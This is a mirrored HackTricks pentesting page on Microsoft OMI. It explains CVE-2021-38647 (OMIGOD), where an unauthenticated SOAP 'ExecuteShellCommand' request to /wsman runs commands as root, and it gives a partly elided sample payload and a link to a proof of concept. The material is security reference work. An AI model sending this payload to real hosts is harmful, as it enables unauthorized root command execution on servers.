mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 16:39:32 +00:00
71 lines
4.2 KiB
Markdown
71 lines
4.2 KiB
Markdown
# 5985,5986 - Pentesting OMI
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
### **Basic Information**
|
|
|
|
**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. It's particularly relevant for Linux servers on Azure that utilize services such as:
|
|
|
|
- **Azure Automation**
|
|
- **Azure Automatic Update**
|
|
- **Azure Operations Management Suite**
|
|
- **Azure Log Analytics**
|
|
- **Azure Configuration Management**
|
|
- **Azure Diagnostics**
|
|
|
|
The process `omiengine` is initiated and listens on all interfaces as root when these services are activated.
|
|
|
|
**Default ports** used are **5985** (http) and **5986** (https).
|
|
|
|
### **[CVE-2021-38647 Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**
|
|
|
|
As observed on September 16, Linux servers deployed in Azure with the mentioned services are susceptible due to a vulnerable version of OMI. This vulnerability lies in the OMI server's handling of messages through the `/wsman` endpoint without requiring an Authentication header, incorrectly authorizing the client.
|
|
|
|
An attacker can exploit this by sending an "ExecuteShellCommand" SOAP payload without an Authentication header, compelling the server to execute commands with root privileges.
|
|
|
|
```xml
|
|
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
|
|
...
|
|
<s:Body>
|
|
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
|
|
<p:command>id</p:command>
|
|
<p:timeout>0</p:timeout>
|
|
</p:ExecuteShellCommand_INPUT>
|
|
</s:Body>
|
|
</s:Envelope>
|
|
```
|
|
|
|
For a more information about this CVE **[check this](https://github.com/horizon3ai/CVE-2021-38647)**.
|
|
|
|
## References
|
|
|
|
* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
|
|
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|